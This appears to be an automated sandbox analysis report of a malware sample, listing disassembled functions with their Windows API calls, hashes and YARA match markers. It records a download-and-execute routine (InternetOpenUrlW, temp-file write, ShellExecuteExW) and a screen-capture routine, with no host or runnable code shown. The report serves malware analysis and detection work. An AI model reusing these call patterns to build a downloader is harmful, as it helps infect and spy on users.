Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: c84488a78f40dbbc30e99ee956911ed66730eec576a4fac8746fc7dbaaebbb15
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 80117C72340100AFD744DE55DD81FE677EAEB89330B298065ED08CB356E679EC01C7A0

Function 02480D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 34064763689ac3de6fc2931be55773beff4606bcf56ef1d504eadd77b2d196bf
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 2E01F272A306008FDF21EF20C905BBF33E5FB86306F0550A6D90A97381E370A8498B80

Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
GetClientRect.USER32(?,?), ref: 0040214A
GetDC.USER32(?), ref: 00402151
CreateSolidBrush.GDI32(00646464), ref: 00402164
SelectObject.GDI32(00000000,00000000), ref: 00402178
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
SelectObject.GDI32(00000000,00000000), ref: 00402191
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
SelectObject.GDI32(00000000,00000000), ref: 004021EA
SetBkMode.GDI32(?,00000001), ref: 00402267
SetTextColor.GDI32(?,00000000), ref: 00402276
_wcslen.LIBCMT ref: 0040227F

Strings

Tahoma, xrefs: 004021BE

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14

Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025CD
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
ReleaseCapture.USER32 ref: 004025F2
GetDC.USER32(00000000), ref: 00402619
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
CreateCompatibleDC.GDI32(?), ref: 004026A9
SelectObject.GDI32(00000000,00000000), ref: 004026B3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
ShowWindow.USER32(?,00000000), ref: 004026EA
GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
DeleteFileW.KERNEL32(?), ref: 00402731
DeleteDC.GDI32(00000000), ref: 00402738
DeleteObject.GDI32(00000000), ref: 0040273F
ReleaseDC.USER32(00000000,?), ref: 0040274D
DestroyWindow.USER32(?), ref: 00402754
SetCapture.USER32(?), ref: 004027A1
GetDC.USER32(00000000), ref: 004027D5
ReleaseDC.USER32(00000000,00000000), ref: 004027EB
GetKeyState.USER32(0000001B), ref: 004027F8
DestroyWindow.USER32(?), ref: 0040280D

Strings

gya, xrefs: 0040270B

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: gya
API String ID: 2545303185-1989253062
Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C

Function 024AE919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024AE989
_free.LIBCMT ref: 024AE99F
_free.LIBCMT ref: 024AE9B0
_free.LIBCMT ref: 024AE9C1
_free.LIBCMT ref: 024AE9D8
GetCPInfo.KERNEL32(?,?), ref: 024AEA20

Part of subcall function 024B6952: _free.LIBCMT ref: 024B69BD

_free.LIBCMT ref: 024AEBCC
_free.LIBCMT ref: 024AEBDF
_free.LIBCMT ref: 024AEBED
_free.LIBCMT ref: 024AEBF8
_free.LIBCMT ref: 024AEC3A
_free.LIBCMT ref: 024AEC42
_free.LIBCMT ref: 024AEC4A
_free.LIBCMT ref: 024AEC52
_free.LIBCMT ref: 024AEC60

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: 5e1dfd718b7591f1d46bb441e6ccfc8cf8dd2dd5689df997bbd09cf117d9b2ec
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: 42B18E71A002099FDB22DFB9C890BEEBBF5BF18304F14456EE4A5A7341D775A841DB60

Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E722
_free.LIBCMT ref: 0042E738
_free.LIBCMT ref: 0042E749
_free.LIBCMT ref: 0042E75A
_free.LIBCMT ref: 0042E771
GetCPInfo.KERNEL32(?,?), ref: 0042E7B9

Part of subcall function 004366EB: _free.LIBCMT ref: 00436756

_free.LIBCMT ref: 0042E965
_free.LIBCMT ref: 0042E978
_free.LIBCMT ref: 0042E986
_free.LIBCMT ref: 0042E991
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E3
_free.LIBCMT ref: 0042E9EB
_free.LIBCMT ref: 0042E9F9

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24

Function 024BA85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 024BA8A3

Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C0F
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C21
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C33
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C45
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C57
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C69
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C7B
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C8D
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C9F
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CB1
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CC3
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CD5
Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CE7

_free.LIBCMT ref: 024BA898

Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9

_free.LIBCMT ref: 024BA8BA
_free.LIBCMT ref: 024BA8CF
_free.LIBCMT ref: 024BA8DA
_free.LIBCMT ref: 024BA8FC
_free.LIBCMT ref: 024BA90F
_free.LIBCMT ref: 024BA91D
_free.LIBCMT ref: 024BA928
_free.LIBCMT ref: 024BA960
_free.LIBCMT ref: 024BA967
_free.LIBCMT ref: 024BA984
_free.LIBCMT ref: 024BA99C

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 92d23df85c1984dc914b7e8637133f71fc969108bfee2958722c8502051df644
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: 1D317C316002109FEB32AF3AD844BDBB7E9AF04750F15486FE449D7750DB71A851EA74

Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A63C

Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80

_free.LIBCMT ref: 0043A631

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A653
_free.LIBCMT ref: 0043A668
_free.LIBCMT ref: 0043A673
_free.LIBCMT ref: 0043A695
_free.LIBCMT ref: 0043A6A8
_free.LIBCMT ref: 0043A6B6
_free.LIBCMT ref: 0043A6C1
_free.LIBCMT ref: 0043A6F9
_free.LIBCMT ref: 0043A700
_free.LIBCMT ref: 0043A71D
_free.LIBCMT ref: 0043A735

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A

Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AD1
_free.LIBCMT ref: 00439AF5
_free.LIBCMT ref: 00439B02
_free.LIBCMT ref: 00439B27
_free.LIBCMT ref: 00439B34
_free.LIBCMT ref: 00439B3D
_free.LIBCMT ref: 00439E1B
_free.LIBCMT ref: 00439E23

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54

Function 02482C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02482C7E
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02482C94
GetTempPathW.KERNEL32(00000105,?), ref: 02482CB0
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02482CC6
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02482CFF
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02482D3B
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02482D58
ShellExecuteExW.SHELL32(?), ref: 02482DCF
WaitForSingleObject.KERNEL32(?,00008000), ref: 02482DE4

Strings

<, xrefs: 02482DAC

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: <
API String ID: 838076374-4251816714
Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction ID: dfc0e9ab0bee59850993c5f6ec385f4a29eda9a922dcd16b32129501a44d6022
Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction Fuzzy Hash: FA41437190025DAEEB20DF659C85FEA77FCFF05745F0080E6A545A2150DF709E858FA4

Function 0249EEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0249F228,00000004,02497D87,00000004,02498069), ref: 0249EEF9
GetLastError.KERNEL32(?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000,?), ref: 0249EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000), ref: 0249EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0249EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF9D

Strings

advapi32.dll, xrefs: 0249EEF3, 0249EEF8, 0249EF14

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction ID: ae1f1b908bb710a69dc326704798a663ad78eb0d77ed836575b414cbbd08f05a
Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction Fuzzy Hash: 882141B6904611BFEB10AFB49C08E5ABFA8EF05B16F004A2BF555D3650DBBC94418FA4

Function 0249EEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0249F228,00000004,02497D87,00000004,02498069), ref: 0249EEF9
GetLastError.KERNEL32(?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000,?), ref: 0249EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000), ref: 0249EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0249EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF9D

Strings

advapi32.dll, xrefs: 0249EEF3, 0249EEF8, 0249EF14

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction ID: 6bb739f46a4a403fbf10ae7054893b96a74a4733b720baee6ff1b43ea12858a0
Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction Fuzzy Hash: 9A2181B2904711BFEB10AF649C08E5ABFECEF05B16F004A2BF555D3600DBBC94418BA8

Function 024924A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0249670B), ref: 024924B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024924C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024924D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0249670B), ref: 02492500
GetProcAddress.KERNEL32(00000000), ref: 02492507
GetLastError.KERNEL32(?,?,?,0249670B), ref: 02492522
GetLastError.KERNEL32(?,?,?,0249670B), ref: 0249252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492544
__CxxThrowException@8.LIBVCRUNTIME ref: 02492552

Strings

kernel32.dll, xrefs: 024924B0, 024924B5, 024924FA

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction ID: d2f11704ab62b6b290706afb9712ea2c6399a1e213f3ede4b01012700adeb202
Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction Fuzzy Hash: 231186759013117FEB11BB756C5996B7FAC9D45B12710052BB801E2251EBB4D5008A69

Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866

Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424898
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042495C

Strings

pContext, xrefs: 00424946
switchState, xrefs: 00424882

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798

Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
DuplicateHandle.KERNEL32(00000000), ref: 00419779
SafeRWList.LIBCONCRT ref: 00419798

Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
Part of subcall function 00417767: List.LIBCMT ref: 00417782

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
GetLastError.KERNEL32 ref: 004197B9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197DD

Strings

eventObject, xrefs: 004197A2

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D

Function 024953A5 Relevance: 15.2, APIs: 10, Instructions: 175COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 024954B0

Part of subcall function 02494EC1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 02494ED5

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 024954D9

Part of subcall function 0249333B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02493357

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02495500
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 024953BA

Part of subcall function 0249339F: __EH_prolog3_GS.LIBCMT ref: 024933A6
Part of subcall function 0249339F: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 024933B5
Part of subcall function 0249339F: GetProcessAffinityMask.KERNEL32(00000000), ref: 024933BC
Part of subcall function 0249339F: GetCurrentThread.KERNEL32 ref: 024933E4
Part of subcall function 0249339F: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 024933EE

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 024953DB
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02495412
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02495455
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02495548
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 0249556C
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 02495579

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
String ID:
API String ID: 64082781-0
Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction ID: d9ab00326051636b390346e071ea3e4670926e3b553b631da5b8fb0fe2f5c702
Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction Fuzzy Hash: 306168719003119FCF19CFA5E8D17AEBBA2FB45326FA4807ED446A7292C731A941CF44

Function 0041513E Relevance: 15.2, APIs: 10, Instructions: 175COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415249

Part of subcall function 00414C5A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C6E

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415272

Part of subcall function 004130D4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004130F0

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415299
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415153

Part of subcall function 00413138: __EH_prolog3_GS.LIBCMT ref: 0041313F
Part of subcall function 00413138: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041314E
Part of subcall function 00413138: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413155
Part of subcall function 00413138: GetCurrentThread.KERNEL32 ref: 0041317D
Part of subcall function 00413138: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00413187

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415174
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151AB
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151EE
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004152E1
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415305
